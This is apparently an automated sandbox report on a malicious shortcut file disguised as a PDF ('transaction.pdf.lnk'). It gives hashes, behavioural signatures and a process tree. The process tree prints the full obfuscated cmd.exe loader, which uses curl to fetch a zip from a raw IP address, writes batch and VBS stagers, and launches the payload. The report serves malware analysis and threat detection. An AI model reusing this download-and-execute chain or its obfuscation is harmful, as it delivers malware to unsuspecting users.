Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10/11/2024, 22:06
Static task
static1
Behavioral task
behavioral1
Sample
transaction.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
transaction.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
transaction.pdf.lnk
-
Size
3KB
-
MD5
0a2f22c7a16adfe8fbfa67b77edc82b4
-
SHA1
c2556809eee64ec4061a50d4ea2ee41d6781371f
-
SHA256
d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
-
SHA512
002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac
Malware Config
Signatures
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
pid Process 2964 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2964 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2204 2372 cmd.exe 31 PID 2372 wrote to memory of 2204 2372 cmd.exe 31 PID 2372 wrote to memory of 2204 2372 cmd.exe 31 PID 2204 wrote to memory of 2664 2204 cmd.exe 32 PID 2204 wrote to memory of 2664 2204 cmd.exe 32 PID 2204 wrote to memory of 2664 2204 cmd.exe 32 PID 2664 wrote to memory of 2780 2664 cscript.exe 34 PID 2664 wrote to memory of 2780 2664 cscript.exe 34 PID 2664 wrote to memory of 2780 2664 cscript.exe 34 PID 2780 wrote to memory of 2964 2780 cmd.exe 36 PID 2780 wrote to memory of 2964 2780 cmd.exe 36 PID 2780 wrote to memory of 2964 2780 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force5⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
448B
MD58fa76d0dea5819256a19064f1639b35c
SHA18dd913107ed46e6df0babd1996c67a65909592b9
SHA256b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a
SHA512468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48
-
Filesize
129B
MD588c7a65cabaeae2e10cbc7bd5608b28b
SHA1d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340